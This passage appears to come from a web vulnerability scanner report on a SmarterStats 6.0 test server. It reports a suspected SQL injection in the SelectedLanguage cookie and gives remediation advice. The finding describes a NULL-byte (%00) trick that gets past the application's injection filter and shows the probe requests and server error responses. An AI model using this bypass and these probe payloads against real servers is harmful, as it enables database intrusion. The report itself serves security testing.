&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;/Sites&gt;
&lt;/GetAllSites2Result&gt;
&lt;/GetAllSites2Response&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetAllSites2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;IncludeDetails&gt;<font class=value>boolean</font>&lt;/IncludeDetails&gt;
&lt;/GetAllSites2&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetAllSites2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetAllSites2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Sites&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations xsi:nil="true" /&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations xsi:nil="true" /&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;/Sites&gt;
&lt;/GetAllSites2Result&gt;
&lt;/GetAllSites2Response&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>GET /Services/SiteAdmin.asmx/GetAllSites2?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>IncludeDetails</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;SiteSettingInfoArrayResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Sites&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;/LogLocations&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;/LogLocations&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;/Sites&gt;
&lt;/SiteSettingInfoArrayResult&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/GetAllSites2 HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>IncludeDetails</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;SiteSettingInfoArrayResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Sites&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;/LogLocations&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;/LogLocations&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;/Sites&gt;
&lt;/SiteSettingInfoArrayResult&gt;</pre>
</span>

</span>









</body>
</html>

2.15. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [SelectedLanguage cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The SelectedLanguage cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the SelectedLanguage cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /Services/SiteAdmin.asmx?op=MoveSite HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=%00'; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:02:13 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6785
Connection: Close

<html>
<head>
<title>Collection was modified; enumeration operation may not execute.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Collection was modified; enumeration operation may not execute.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.InvalidOperationException: Collection was modified; enumeration operation may not execute.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[InvalidOperationException: Collection was modified; enumeration operation may not execute.]
System.Collections.HashtableEnumerator.MoveNext() +12630115
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +536
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[InvalidOperationException]: Collection was modified; enumeration operation may not execute.
at System.Collections.Hashtable.HashtableEnumerator.MoveNext()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=MoveSite HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=%00''; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:02:13 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 14519
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>MoveSite</h2>
<p class="intro">Moves one site from one Server to another Server listed in the MRS.</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/MoveSite' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
